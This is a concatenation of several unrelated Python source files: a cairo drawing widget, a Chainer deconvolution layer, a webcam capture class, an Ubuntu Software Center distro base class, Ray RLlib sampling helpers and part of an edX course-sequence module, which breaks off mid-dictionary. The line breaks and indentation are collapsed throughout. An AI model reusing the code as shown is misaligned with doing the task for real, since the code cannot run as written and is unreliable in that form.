width, height, xadvance, yadvance = (cr.text_extents(distance)) x = ((self.ruler[0] + self.ruler[2]) / 2) y = ((self.ruler[1] + self.ruler[3]) / 2) cr.set_source_rgba(0, 0, 0, 0.6) cr.set_line_width(1) cr.rectangle(x - width, y - height, width*2, height*2) cr.fill() cr.stroke() cr.set_source_rgba(0, 0, 0, 1) cr.move_to(x + 1 - width/2, y + 1) cr.show_text(distance) cr.set_source_rgba(1, 1, 1, 1) cr.move_to(x - width/2, y) cr.show_text(distance) cr.set_dash([], 0) cr.stroke() # draw curr_xy if self.mc.curr_xy is not None and draw_curr_xy: x, y = self.mc.curr_xy[0], self.mc.curr_xy[1] for i in range(1, 4): cr.set_line_width(5 - i) cr.set_source_rgba(1, 0, 1, ((float(self.cp_radius) / 15.0))) cr.arc(x, y, (float(10 - self.cp_radius) * float(i) / 4.0) * 3 + 2, 0, 2*math.pi) cr.stroke() cr.set_source_rgba(1, 0, 1, 1) cr.arc(x, y, 2.5, 0, 2*math.pi) cr.fill() cr.stroke() def do_expose_event(self, event): if self.mc is None \ or self.mc.bg_surface is None: self.set_size_request(0, 0) return # set widget size based on image map self.set_size_request(self.mc.bg_w, self.mc.bg_h) # create cairo surface cr = self.window.cairo_create() cr.rectangle(event.area.x, event.area.y, event.area.width, event.area.height) cr.clip() self.do_draw(cr, True) def select_mode(self, mode, x = 0, y = 0): if mode is None: self.select_x = None self.select_y = None self.select_m = None self.redraw() return if mode != "H" and mode != "V" and mode != "A" and mode != "P": logging.error("Bad selection mode '%s'." % mode) return self.select_m = mode self.select_x = x self.select_y = y self.redraw() def save_png(self, path): logging.info("\t%s: Saving image (%d, %d) pixels" % (path, self.mc.bg_w, self.mc.bg_h)) logging.info("\t%s: Creating cairo context and surface" % (path)) dst_surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, self.mc.bg_w, self.mc.bg_h) dst_ctx = cairo.Context(dst_surface) logging.info("\t%s: drawing" % (path)) self.do_draw(dst_ctx, False) logging.info("\t%s: writing" % (path)) dst_surface.write_to_png(path)
import numpy from chainer.backends import cuda from chainer.functions.connection import deconvolution_2d from chainer import initializers from chainer import link from chainer.utils import argument from chainer import variable class Deconvolution2D(link.Link): """__init__(self, in_channels, out_channels, ksize=None, stride=1, pad=0, nobias=False, outsize=None, initialW=None, initial_bias=None, *, groups=1) Two dimensional deconvolution function. This link wraps the :func:`~chainer.functions.deconvolution_2d` function and holds the filter weight and bias vector as parameters. Deconvolution links can use a feature of cuDNN called autotuning, which selects the most efficient CNN algorithm for images of fixed-size, can provide a significant performance boost for fixed neural nets. To enable, set `chainer.using_config('autotune', True)` Args: in_channels (int or None): Number of channels of input arrays. If ``None``, parameter initialization will be deferred until the first forward data pass at which time the size will be determined. out_channels (int): Number of channels of output arrays. ksize (int or pair of ints): Size of filters (a.k.a. kernels). ``ksize=k`` and ``ksize=(k, k)`` are equivalent. stride (int or pair of ints): Stride of filter applications. ``stride=s`` and ``stride=(s, s)`` are equivalent. pad (int or pair of ints): Spatial padding width for input arrays. ``pad=p`` and ``pad=(p, p)`` are equivalent. nobias (bool): If ``True``, then this function does not use the bias term. outsize (tuple): Expected output size of deconvolutional operation. It should be pair of height and width :math:`(out_H, out_W)`. Default value is ``None`` and the outsize is estimated by input size, stride and pad. initialW (:ref:`initializer <initializer>`): Initializer to initialize the weight. When it is :class:`numpy.ndarray`, its ``ndim`` should be 4. initial_bias (:ref:`initializer <initializer>`): Initializer to initialize the bias. If ``None``, the bias will be initialized to zero. When it is :class:`numpy.ndarray`, its ``ndim`` should be 1. groups (int): The number of groups to use grouped deconvolution. The default is one, where grouped deconvolution is not used. The filter weight has four dimensions :math:`(c_I, c_O, k_H, k_W)` which indicate the number of input channels, output channels, height and width of the kernels, respectively. The filter weight is initialized with i.i.d. Gaussian random samples, each of which has zero mean and deviation :math:`\\sqrt{1/(c_I k_H k_W)}` by default. The bias vector is of size :math:`c_O`. Its elements are initialized by ``bias`` argument. If ``nobias`` argument is set to True, then this function does not hold the bias parameter. The output of this function can be non-deterministic when it uses cuDNN. If ``chainer.configuration.config.cudnn_deterministic`` is ``True`` and cuDNN version is >= v3, it forces cuDNN to use a deterministic algorithm. .. seealso:: See :func:`chainer.functions.deconvolution_2d` for the definition of two-dimensional convolution. .. seealso:: See :func:`chainer.links.Convolution2D` for the examples of ways to give arguments to this link. .. admonition:: Example There are several ways to make a Deconvolution2D link. Let an input vector ``x`` be: >>> x = np.arange(1 * 3 * 10 * 10, dtype=np.float32).reshape(1, 3, 10, 10) 1. Give the first three arguments explicitly: In this case, all the other arguments are set to the default values. >>> l = L.Deconvolution2D(3, 7, 4) >>> y = l(x) >>> y.shape (1, 7, 13, 13) 2. Omit ``in_channels`` or fill it with ``None``: The below two cases are the same. >>> l = L.Deconvolution2D(7, 4) >>> y = l(x) >>> y.shape (1, 7, 13, 13) >>> l = L.Deconvolution2D(None, 7, 4) >>> y = l(x) >>> y.shape (1, 7, 13, 13) When you omit the first argument, you need to specify the other subsequent arguments from ``stride`` as keyword arguments. So the below two cases are the same. >>> l = L.Deconvolution2D(None, 7, 4, 2, 1) >>> y = l(x) >>> y.shape (1, 7, 20, 20) >>> l = L.Deconvolution2D(7, 4, stride=2, pad=1) >>> y = l(x) >>> y.shape (1, 7, 20, 20) """ # NOQA def __init__(self, in_channels, out_channels, ksize=None, stride=1, pad=0, nobias=False, outsize=None, initialW=None, initial_bias=None, **kwargs): super(Deconvolution2D, self).__init__() groups, = argument.parse_kwargs( kwargs, ('groups', 1), deterministic="deterministic argument is not supported anymore. " "Use chainer.using_config('cudnn_deterministic', value) " "context where value is either `True` or `False`.") if ksize is None: out_channels, ksize, in_channels = in_channels, out_channels, None self.ksize = ksize self.stride = _pair(stride) self.pad = _pair(pad) self.outsize = (None, None) if outsize is None else outsize self.out_channels = out_channels self.groups = int(groups) with self.init_scope(): W_initializer = initializers._get_initializer(initialW) self.W = variable.Parameter(W_initializer) if in_channels is not None: self._initialize_params(in_channels) if nobias: self.b = None else: if isinstance(initial_bias, (numpy.ndarray, cuda.ndarray)): assert initial_bias.shape == (out_channels,) if initial_bias is None: initial_bias = 0 bias_initializer = initializers._get_initializer(initial_bias) self.b = variable.Parameter(bias_initializer, out_channels) def _initialize_params(self, in_channels): kh, kw = _pair(self.ksize) if self.out_channels % self.groups != 0: raise ValueError('the number of output channels must be' 'divisible by the number of groups') if in_channels % self.groups != 0: raise ValueError('the number of input channels must be' 'divisible by the number of groups') W_shape = (in_channels, int(self.out_channels / self.groups), kh, kw) self.W.initialize(W_shape) def forward(self, x): if self.W.array is None: self._initialize_params(x.shape[1]) return deconvolution_2d.deconvolution_2d( x, self.W, self.b, self.stride, self.pad, self.outsize, groups=self.groups) def _pair(x): if hasattr(x, '__getitem__'): return x return x, x
""" sc_webcam.py This file includes functions to: initialise a web cam capture image from web cam Image size is held in the smart_camera.cnf """ import sys import time import math import cv2 import sc_config class SmartCameraWebCam: def __init__(self, instance): # health self.healthy = False; # record instance self.instance = instance self.config_group = "camera%d" % self.instance # get image resolution self.img_width = sc_config.config.get_integer(self.config_group,'width',640) self.img_height = sc_config.config.get_integer(self.config_group,'height',480) # background image processing variables self.img_counter = 0 # num images requested so far # latest image captured self.latest_image = None # setup video capture self.camera = cv2.VideoCapture(self.instance) # check we can connect to camera if not self.camera.isOpened(): print ("failed to open webcam %d" % self.instance) # __str__ - print position vector as string def __str__(self): return "SmartCameraWebCam Object W:%d H:%d" % (self.img_width, self.img_height) # latest_image - returns latest image captured def get_latest_image(self): # write to file #imgfilename = "C:\Users\rmackay9\Documents\GitHub\ardupilot-balloon-finder\smart_camera\img%d-%d.jpg" % (cam_num,cam.get_image_counter()) imgfilename = "img%d-%d.jpg" % (self.instance,self.get_image_counter()) print (imgfilename) cv2.imwrite(imgfilename, self.latest_image) return self.latest_image # get_image_counter - returns number of images captured since startup def get_image_counter(self): return self.img_counter # take_picture - take a picture # returns True on success def take_picture(self): # setup video capture print("Taking Picture") self.camera = cv2.VideoCapture(self.instance) self.camera.set(cv2.cv.CV_CAP_PROP_FRAME_WIDTH,self.img_width) self.camera.set(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT,self.img_height) # check we can connect to camera if not self.camera.isOpened(): self.healty = False return False # get an image from the webcam success_flag, self.latest_image=self.camera.read() # release camera self.camera.release() # if successful overwrite our latest image if success_flag: self.img_counter = self.img_counter+1 return True # return failure return False # main - tests SmartCameraWebCam class def main(self): while True: # send request to image capture for image if self.take_picture(): # display image cv2.imshow ('image_display', self.get_latest_image()) else: print ("no image") # check for ESC key being pressed k = cv2.waitKey(5) & 0xFF if k == 27: break # take a rest for a bit time.sleep(0.01) # run test run from the command line if __name__ == "__main__": sc_webcam0 = SmartCameraWebCam(0) sc_webcam0.main()
# Copyright (C) 2009 Canonical # # Authors: # Michael Vogt # # This program is free software; you can redistribute it and/or modify it under # the terms of the GNU General Public License as published by the Free Software # Foundation; version 3. # # This program is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS # FOR A PARTICULAR PURPOSE. See the GNU General Public License for more # details. # # You should have received a copy of the GNU General Public License along with # this program; if not, write to the Free Software Foundation, Inc., # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA import logging import os from gettext import gettext as _ import lsb_release from softwarecenter.utils import UnimplementedError, utf8 log = logging.getLogger(__name__) class Distro(object): """ abstract base class for a distribution """ # list of code names for the distro from newest to oldest, this is # used e.g. in the reviews loader if no reviews for the current codename # are found DISTROSERIES = [] # base path for the review summary, the JS will append %i.png (with i={1,5}) REVIEW_SUMMARY_STARS_BASE_PATH = "/usr/share/software-center/images/review-summary" REVIEWS_SERVER = os.environ.get("SOFTWARE_CENTER_REVIEWS_HOST") or "http://localhost:8000" # You need to set this var to enable purchases PURCHASE_APP_URL = "" # Point developers to a web page DEVELOPER_URL = "" def __init__(self, lsb_info): """Return a new generic Distro instance.""" self.lsb_info = lsb_info def get_app_name(self): """ The name of the application (as displayed in the main window and the about window) """ return _("Software Center") def get_app_description(self): """ The description of the application displayed in the about dialog """ return _("Lets you choose from thousands of applications available for your system.") def get_distro_channel_name(self): """ The name of the main channel in the Release file (e.g. Ubuntu)""" return "none" def get_distro_channel_description(self): """ The description for the main distro channel """ return "none" def get_codename(self): """ The codename of the distro, e.g. lucid """ # for tests and similar if "SOFTWARE_CENTER_DISTRO_CODENAME" in os.environ: return os.environ["SOFTWARE_CENTER_DISTRO_CODENAME"] # normal behavior if not hasattr(self, "_distro_code_name"): self._distro_code_name = \ lsb_release.get_distro_information()["CODENAME"] return self._distro_code_name def get_maintenance_status(self, cache, appname, pkgname, component, channelname): raise UnimplementedError def get_license_text(self, component): raise UnimplementedError def is_supported(self, cache, doc, pkgname): """ return True if the given document and pkgname is supported by the distribution """ raise UnimplementedError def get_supported_query(self): """ return a xapian query that gives all supported documents """ import xapian return xapian.Query() def get_supported_filter_name(self): return _("Supported Software") def get_install_warning_text(self, cache, pkg, appname, depends): primary = utf8(_("To install %s, these items must be removed:")) % utf8(appname) button_text = _("Install Anyway") # alter it if a meta-package is affected for m in depends: if cache[m].section == "metapackages": primary = utf8(_("If you install %s, future updates will not " "include new items in <b>%s</b> set. " "Are you sure you want to continue?")) % (utf8(appname), cache[m].installed.summary) button_text = _("Install Anyway") depends = [] break # alter it if an important meta-package is affected for m in self.IMPORTANT_METAPACKAGES: if m in depends: primary = utf8(_("Installing %s may cause core applications to " "be removed. " "Are you sure you want to continue?")) % utf8(appname) button_text = _("Install Anyway") depends = None break return (primary, button_text) # generic version of deauthorize, can be customized by the distro def get_deauthorize_text(self, account_name, purchased_packages): if len(purchased_packages) == 0: if account_name: primary = _('Are you sure you want to deauthorize this computer ' 'from the "%s" account?') % account_name else: primary = _('Are you sure you want to deauthorize this computer ' 'for purchases?') button_text = _('Deauthorize') else: if account_name: primary = _('Deauthorizing this computer from the "%s" account ' 'will remove this purchased software:') % account_name else: primary = _('Deauthorizing this computer for purchases ' 'will remove the following purchased software:') button_text = _('Remove All') return (primary, button_text) # generic architecture detection code def get_architecture(self): return None def _get_distro(): lsb_info = lsb_release.get_distro_information() distro_id = lsb_info["ID"] log.debug("get_distro: '%s'", distro_id) # start with a import, this gives us only a softwarecenter module module = __import__(distro_id, globals(), locals(), [], -1) # get the right class and instanciate it distro_class = getattr(module, distro_id) instance = distro_class(lsb_info) return instance def get_distro(): """ factory to return the right Distro object """ return distro_instance def get_current_arch(): return get_distro().get_architecture() def get_foreign_architectures(): return get_distro().get_foreign_architectures() # singelton distro_instance=_get_distro() if __name__ == "__main__": print(get_distro())
from __future__ import absolute_import from __future__ import division from __future__ import print_function import logging import ray from ray.rllib.policy.sample_batch import SampleBatch from ray.rllib.utils.memory import ray_get_and_free logger = logging.getLogger(__name__) def collect_samples(agents, sample_batch_size, num_envs_per_worker, train_batch_size): """Collects at least train_batch_size samples, never discarding any.""" num_timesteps_so_far = 0 trajectories = [] agent_dict = {} for agent in agents: fut_sample = agent.sample.remote() agent_dict[fut_sample] = agent while agent_dict: [fut_sample], _ = ray.wait(list(agent_dict)) agent = agent_dict.pop(fut_sample) next_sample = ray_get_and_free(fut_sample) assert next_sample.count >= sample_batch_size * num_envs_per_worker num_timesteps_so_far += next_sample.count trajectories.append(next_sample) # Only launch more tasks if we don't already have enough pending pending = len(agent_dict) * sample_batch_size * num_envs_per_worker if num_timesteps_so_far + pending < train_batch_size: fut_sample2 = agent.sample.remote() agent_dict[fut_sample2] = agent return SampleBatch.concat_samples(trajectories) def collect_samples_straggler_mitigation(agents, train_batch_size): """Collects at least train_batch_size samples. This is the legacy behavior as of 0.6, and launches extra sample tasks to potentially improve performance but can result in many wasted samples. """ num_timesteps_so_far = 0 trajectories = [] agent_dict = {} for agent in agents: fut_sample = agent.sample.remote() agent_dict[fut_sample] = agent while num_timesteps_so_far < train_batch_size: # TODO(pcm): Make wait support arbitrary iterators and remove the # conversion to list here. [fut_sample], _ = ray.wait(list(agent_dict)) agent = agent_dict.pop(fut_sample) # Start task with next trajectory and record it in the dictionary. fut_sample2 = agent.sample.remote() agent_dict[fut_sample2] = agent next_sample = ray_get_and_free(fut_sample) num_timesteps_so_far += next_sample.count trajectories.append(next_sample) logger.info("Discarding {} sample tasks".format(len(agent_dict))) return SampleBatch.concat_samples(trajectories)
""" xModule implementation of a learning sequence """ # pylint: disable=abstract-method import collections import json import logging from datetime import datetime from functools import reduce import six from django.contrib.auth import get_user_model from lxml import etree from opaque_keys.edx.keys import UsageKey from pkg_resources import resource_string from pytz import UTC from six import text_type from web_fragments.fragment import Fragment from xblock.completable import XBlockCompletionMode from xblock.core import XBlock from xblock.exceptions import NoSuchServiceError from xblock.fields import Boolean, Integer, List, Scope, String from edx_toggles.toggles import LegacyWaffleFlag from edx_toggles.toggles import WaffleFlag # lint-amnesty, pylint: disable=unused-import from lms.djangoapps.courseware.toggles import COURSEWARE_PROCTORING_IMPROVEMENTS from .exceptions import NotFoundError from .fields import Date from .mako_module import MakoModuleDescriptor from .progress import Progress from .x_module import AUTHOR_VIEW, PUBLIC_VIEW, STUDENT_VIEW, XModule from .xml_module import XmlDescriptor log = logging.getLogger(__name__) try: import newrelic.agent except ImportError: newrelic = None # pylint: disable=invalid-name # HACK: This shouldn't be hard-coded to two types # OBSOLETE: This obsoletes 'type' class_priority = ['video', 'problem'] # Make '_' a no-op so we can scrape strings. Using lambda instead of # `django.utils.translation.ugettext_noop` because Django cannot be imported in this file _ = lambda text: text TIMED_EXAM_GATING_WAFFLE_FLAG = LegacyWaffleFlag( waffle_namespace="xmodule", flag_name=u'rev_1377_rollout', module_name=__name__, ) class SequenceFields(object): # lint-amnesty, pylint: disable=missing-class-docstring has_children = True completion_mode = XBlockCompletionMode.AGGREGATOR # NOTE: Position is 1-indexed. This is silly, but there are now student # positions saved on prod, so it's not easy to fix. position = Integer(help="Last tab viewed in this sequence", scope=Scope.user_state) due = Date( display_name=_("Due Date"), help=_("Enter the date by which problems are due."), scope=Scope.settings, ) hide_after_due = Boolean( display_name=_("Hide sequence content After Due Date"), help=_( "If set, the sequence content is hidden for non-staff users after the due date has passed." ), default=False, scope=Scope.settings, ) is_entrance_exam = Boolean( display_name=_("Is Entrance Exam"), help=_( "Tag this course module as an Entrance Exam. " "Note, you must enable Entrance Exams for this course setting to take effect." ), default=False, scope=Scope.settings, ) class ProctoringFields(object): """ Fields that are specific to Proctored or Timed Exams """ is_time_limited = Boolean( display_name=_("Is Time Limited"), help=_( "This setting indicates whether students have a limited time" " to view or interact with this courseware component." ), default=False, scope=Scope.settings, ) default_time_limit_minutes = Integer( display_name=_("Time Limit in Minutes"), help=_( "The number of minutes available to students for viewing or interacting with this courseware component." ), default=None, scope=Scope.settings, ) is_proctored_enabled = Boolean( display_name=_("Is Proctoring Enabled"), help=_( "This setting indicates whether this exam is a proctored exam." ), default=False, scope=Scope.settings, ) exam_review_rules = String( display_name=_("Software Secure Review Rules"), help=_( "This setting indicates what rules the proctoring team should follow when viewing the videos." ), default='', scope=Scope.settings, ) is_practice_exam = Boolean( display_name=_("Is Practice Exam"), help=_( "This setting indicates whether this exam is for testing purposes only. Practice exams are not verified." ), default=False, scope=Scope.settings, ) is_onboarding_exam = Boolean( display_name=_("Is Onboarding Exam"), help=_( "This setting indicates whether this exam is an onboarding exam." ), default=False, scope=Scope.settings, ) def _get_course(self): """ Return course by course id. """ return self.descriptor.runtime.modulestore.get_course(self.course_id) # pylint: disable=no-member @property def is_timed_exam(self): """ Alias the permutation of above fields that corresponds to un-proctored timed exams to the more clearly-named is_timed_exam """ return not self.is_proctored_enabled and not self.is_practice_exam and self.is_time_limited @property def is_proctored_exam(self): """ Alias the is_proctored_enabled field to the more legible is_proctored_exam """ return self.is_proctored_enabled @property def allow_proctoring_opt_out(self): """ Returns true if the learner should be given the option to choose between taking a proctored exam, or opting out to take the exam without proctoring. """ return self._get_course().allow_proctoring_opt_out @is_proctored_exam.setter def is_proctored_exam(self, value): """ Alias the is_proctored_enabled field to the more legible is_proctored_exam """ self.is_proctored_enabled = value @XBlock.wants('proctoring') @XBlock.wants('verification') @XBlock.wants('gating') @XBlock.wants('credit') @XBlock.wants('completion') @XBlock.needs('user') @XBlock.needs('bookmarks') @XBlock.needs('i18n') @XBlock.wants('content_type_gating') class SequenceModule(SequenceFields, ProctoringFields, XModule): """ Layout module which lays out content in a temporal sequence """ js = { 'js': [resource_string(__name__, 'js/src/sequence/display.js')], } css = { 'scss': [resource_string(__name__, 'css/sequence/display.scss')], } js_module_name = "Sequence" def __init__(self, *args, **kwargs): super(SequenceModule, self).__init__(*args, **kwargs) # lint-amnesty, pylint: disable=super-with-arguments self.gated_sequence_paywall = None # If position is specified in system, then use that instead. position = getattr(self.system, 'position', None) if position is not None: assert isinstance(position, int) self.position = self.system.position def get_progress(self): ''' Return the total progress, adding total done and total available. (assumes that each submodule uses the same "units" for progress.) ''' # TODO: Cache progress or children array? children = self.get_children() progresses = [child.get_progress() for child in children] progress = reduce(Progress.add_counts, progresses, None) return progress def handle_ajax(self, dispatch, data, view=STUDENT_VIEW): # TODO: bounds checking # lint-amnesty, pylint: disable=arguments-differ ''' get = request.POST instance ''' if dispatch == 'goto_position': # set position to default value if either 'position' argument not # found in request or it is a non-positive integer position = data.get('position', u'1') if position.isdigit() and int(position) > 0: self.position = int(position) else: self.position = 1 return json.dumps({'success': True}) if dispatch == 'get_completion': completion_service = self.runtime.service(self, 'completion') usage_key = data.get('usage_key', None) if not usage_key: return None item = self.get_child(UsageKey.from_string(usage_key)) if not item: return None complete = completion_service.vertical_is_complete(item) return json.dumps({ 'complete': complete }) elif dispatch == 'metadata': context = {'exclude_units': True} prereq_met = True prereq_meta_info = {} banner_text = None display_items = self.get_display_items() if self._required_prereq(): if self.runtime.user_is_staff: banner_text = _('This subsection is unlocked for learners when they meet the prerequisite requirements.') # lint-amnesty, pylint: disable=line-too-long else: # check if prerequisite has been met prereq_met, prereq_meta_info = self._compute_is_prereq_met(True) meta = self._get_render_metadata(context, display_items, prereq_met, prereq_meta_info, banner_text, view) meta['display_name'] = self.display_name_with_default meta['format'] = getattr(self, 'format', '') return json.dumps(meta) raise NotFoundError('Unexpected dispatch type') @classmethod def verify_current_content_visibility(cls, date, hide_after_date): """ Returns whether the content visibility policy passes for the given date and hide_after_date values and the current date-time. """ return ( not date or not hide_after_date or datetime.now(UTC) < date ) def gate_entire_sequence_if_it_is_a_timed_exam_and_contains_content_type_gated_problems(self): """ Problem: Content type gating for FBE (Feature Based Enrollments) previously only gated individual blocks. This was an issue because audit learners could start a timed exam and then be unable to complete it because the graded content would be gated. Even if they later upgraded, they could still be unable to complete the exam because the timer could have expired. Solution: Gate the entire sequence when we think the above problem can occur. If: 1. This sequence is a timed exam (this is currently being checked before calling) 2. And this sequence contains problems which this user cannot load due to content type gating Then: We will gate access to the entire sequence. Otherwise, learners would have the ability to start their timer for an exam, but then not have the ability to complete it. We are displaying the gating fragment within the sequence, as is done for gating for prereqs, rather than content type gating the entire sequence because that would remove the next/previous navigation. When gated_sequence_paywall is not set to None, the sequence will be gated. This functionality still needs to be replicated in the frontend-app-learning courseware MFE The ticket to track this is https://openedx.atlassian.net/browse/REV-1220 Note that this will break compatability with using sequences outside of edx-platform but we are ok with this for now """ content_type_gating_service = self.runtime.service(self, 'content_type_gating') if content_type_gating_service: self.gated_sequence_paywall = content_type_gating_service.check_children_for_content_type_gating_paywall( self, self.course_id ) def student_view(self, context): _ = self.runtime.service(self, "i18n").ugettext context = context or {} self._capture_basic_metrics() banner_text = None prereq_met = True prereq_meta_info = {} if self._required_prereq(): if self.runtime.user_is_staff: banner_text = _('This subsection is unlocked for learners when they meet the prerequisite requirements.') # lint-amnesty, pylint: disable=line-too-long else: # check if prerequisite has been met prereq_met, prereq_meta_info = self._compute_is_prereq_met(True) if prereq_met: special_html_view = self._hidden_content_student_view(context) or self._special_exam_student_view() if special_html_view: masquerading_as_specific_student = context.get('specific_masquerade', False) banner_text, special_html = special_html_view if special_html and not masquerading_as_specific_student: return Fragment(special_html) return self._student_or_public_view(context, prereq_met, prereq_meta_info, banner_text) def public_view(self, context): """ Renders the preview view of the block in the LMS. """ prereq_met = True prereq_meta_info = {} if self._required_prereq(): prereq_met, prereq_meta_info = self._compute_is_prereq_met(True) return self._student_or_public_view(context or {}, prereq_met, prereq_meta_info, None, PUBLIC_VIEW) def author_view(self, context): # lint-amnesty, pylint: disable=missing-function-docstring context = context or {} context['exclude_units'] = True if 'position' in context: context['position'] = int(context['position']) return self._student_or_public_view(context, True, {}, view=AUTHOR_VIEW) def _special_exam_student_view(self): """ Checks whether this sequential is a special exam. If so, returns a banner_text or the fragment to display depending on whether staff is masquerading. """ _ = self.runtime.service(self, "i18n").ugettext if self.is_time_limited: if TIMED_EXAM_GATING_WAFFLE_FLAG.is_enabled(): # set the self.gated_sequence_paywall variable self.gate_entire_sequence_if_it_is_a_timed_exam_and_contains_content_type_gated_problems() if self.gated_sequence_paywall is None: special_exam_html = self._time_limited_student_view() if special_exam_html: banner_text = _("This exam is hidden from the learner.") return banner_text, special_exam_html def _hidden_content_student_view(self, context): """ Checks whether the content of this sequential is hidden from the runtime user. If so, returns a banner_text or the fragment to display depending on whether staff is masquerading. """ _ = self.runtime.service(self, "i18n").ugettext course = self._get_course() if not self._can_user_view_content(course): if course.self_paced: banner_text = _("Because the course has ended, this assignment is hidden from the learner.") else: banner_text = _("Because the due date has passed, this assignment is hidden from the learner.") hidden_content_html = self.system.render_template( 'hidden_content.html', { 'self_paced': course.self_paced, 'progress_url': context.get('progress_url'), } ) return banner_text, hidden_content_html def _can_user_view_content(self, course): """ Returns whether the runtime user can view the content of this sequential. """ hidden_date = course.end if course.self_paced else self.due return ( self.runtime.user_is_staff or self.verify_current_content_visibility(hidden_date, self.hide_after_due) ) def is_user_authenticated(self, context): # NOTE (CCB): We default to true to maintain the behavior in place prior to allowing anonymous access access. return context.get('user_authenticated', True) def _get_render_metadata(self, context, display_items, prereq_met, prereq_meta_info, banner_text=None, view=STUDENT_VIEW, fragment=None): # lint-amnesty, pylint: disable=line-too-long, missing-function-docstring if prereq_met and not self._is_gate_fulfilled(): banner_text = _( 'This section is a prerequisite. You must complete this section in order to unlock additional content.' ) items = self._render_student_view_for_items(context, display_items, fragment, view) if prereq_met else [] params = { 'items': items, 'element_id': self.location.html_id(), 'item_id': text_type(self.location), 'is_time_limited': self.is_time_limited, 'position': self.position, 'tag': self.location.block_type, 'ajax_url': self.system.ajax_url, 'next_url': context.get('next_url'), 'prev_url': context.get('prev_url'), 'banner_text': banner_text, 'save_position': view != PUBLIC_VIEW, 'show_completion': view != PUBLIC_VIEW, 'gated_content': self._get_gated_content_info(prereq_met, prereq_meta_info), 'sequence_name': self.display_name, 'exclude_units': context.get('exclude_units', False), 'gated_sequence_paywall': self.gated_sequence_paywall } return params def _student_or_public_view(self, context, prereq_met, prereq_meta_info, banner_text=None, view=STUDENT_VIEW): """ Returns the rendered student view of the content of this sequential. If banner_text is given, it is added to the content. """ _ = self.runtime.service(self, "i18n").ugettext display_items = self.get_display_items() self._update_position(context, len(display_items)) fragment = Fragment() params = self._get_render_metadata(context, display_items, prereq_met, prereq_meta_info, banner_text, view, fragment) # lint-amnesty, pylint: disable=line-too-long fragment.add_content(self.system.render_template("seq_module.html", params)) self._capture_full_seq_item_metrics(display_items) self._capture_current_unit_metrics(display_items) return fragment def _get_gated_content_info(self, prereq_met, prereq_meta_info): """ Returns a dict of information about gated_content context """ gated_content = { 'prereq_id': None, 'prereq_url': None, 'prereq_section_name': None, 'gated': False, 'gated_section_name': self.display_name, } if not prereq_met: gated_content['gated'] = True gated_content['prereq_url'] = prereq_meta_info['url'] gated_content['prereq_section_name'] = prereq_meta_info['display_name'] gated_content['prereq_id'] = prereq_meta_info['id'] return gated_content def _is_gate_fulfilled(self): """ Determines if this section is a prereq and has any unfulfilled milestones. Returns: True if section has no unfufilled milestones or is not a prerequisite. False otherwise """ gating_service = self.runtime.service(self, 'gating') if gating_service: fulfilled = gating_service.is_gate_fulfilled( self.course_id, self.location, self.runtime.user_id ) return fulfilled return True def _required_prereq(self): """ Checks whether a prerequisite is required for this Section Returns: milestone if a prereq is required, None otherwise """ gating_service = self.runtime.service(self, 'gating') if gating_service: milestone = gating_service.required_prereq( self.course_id, self.location, 'requires' ) return milestone return None def descendants_are_gated(self): """ Sequences do their own access gating logic as to whether their content should be viewable, based on things like pre-reqs and time exam starts. Ideally, this information would be passed down to all descendants so that they would know if it's safe to render themselves, but the least invasive patch to this is to make a method that rendering Django views can use to verify before rendering descendants. This does _NOT_ check for the content types of children because the performing that traversal undoes a lot of the performance gains made in large sequences when hitting the render_xblock endpoint directly. This method is here mostly to help render_xblock figure out if it's okay to render a descendant of a sequence to guard against malicious actors. So the "let's check all descendants to not let people start an exam they can't finish" reasoning of doing the full traversal does not apply. Returns: True if this sequence and its descendants are gated by what are currently sequence-level checks. False if the sequence is and its decendants are not gated. Note that this gating logic is only a part of the equation when it comes to determining whether a student is allowed to access this, with other checks being done in has_access calls. """ if self.runtime.user_is_staff: return False # We're not allowed to see it because of pre-reqs that haven't been # fullfilled. if self._required_prereq(): prereq_met, _prereq_meta_info = self._compute_is_prereq_met(True) if not prereq_met: return True # Are we a time limited test that hasn't started yet? if self.is_time_limited: if self._time_limited_student_view() or self._hidden_content_student_view({}): return True # Otherwise, nothing is blocking us. return False def _compute_is_prereq_met(self, recalc_on_unmet): """ Evaluate if the user has completed the prerequisite Arguments: recalc_on_unmet: Recalculate the subsection grade if prereq has not yet been met Returns: tuple: True|False, prereq_meta_info = { 'url': prereq_url, 'display_name': prereq_name} """ gating_service = self.runtime.service(self, 'gating') if gating_service: return gating_service.compute_is_prereq_met(self.location, self.runtime.user_id, recalc_on_unmet) return True, {} def _update_position(self, context, number_of_display_items): """ Update the user's sequential position given the context and the number_of_display_items """ position = context.get('position') if position: self.position = position # If we're rendering this sequence, but no position is set yet, # or exceeds the length of the displayable items, # default the position to the first element if context.get('requested_child') == 'first': self.position = 1 elif context.get('requested_child') == 'last': self.position = number_of_display_items or 1 elif self.position is None or self.position > number_of_display_items: self.position = 1 def _render_student_view_for_items(self, context, display_items, fragment, view=STUDENT_VIEW): """ Updates the given fragment with rendered student views of the given display_items. Returns a list of dict objects with information about the given display_items. """ render_items = not context.get('exclude_units', False) is_user_authenticated = self.is_user_authenticated(context) completion_service = self.runtime.service(self, 'completion') try: bookmarks_service = self.runtime.service(self, 'bookmarks') except NoSuchServiceError: bookmarks_service = None user = self.runtime.service(self, 'user').get_current_user() context['username'] = user.opt_attrs.get( 'edx-platform.username') display_names = [ self.get_parent().display_name_with_default, self.display_name_with_default ] contents = [] for item in display_items: # NOTE (CCB): This seems like a hack, but I don't see a better method of determining the type/category. item_type = item.get_icon_class() usage_id = item.scope_ids.usage_id show_bookmark_button = False is_bookmarked = False if is_user_authenticated and bookmarks_service: show_bookmark_button = True is_bookmarked = bookmarks_service.is_bookmarked(usage_key=usage_id) context['show_bookmark_button'] = show_bookmark_button context['bookmarked'] = is_bookmarked context['format'] = getattr(self, 'format', '') if render_items: rendered_item = item.render(view, context) fragment.add_fragment_resources(rendered_item) content = rendered_item.content else: content = '' content_type_gating_service = self.runtime.service(self, 'content_type_gating') contains_content_type_gated_content = False if content_type_gating_service: contains_content_type_gated_content = content_type_gating_service.check_children_for_content_type_gating_paywall( # pylint:disable=line-too-long item, self.course_id ) is not None iteminfo = { 'content': content, 'page_title': getattr(item, 'tooltip_title', ''), 'type': item_type, 'id': text_type(usage_id), 'bookmarked': is_bookmarked, 'path': " > ".join(display_names + [item.display_name_with_default]), 'graded': item.graded, 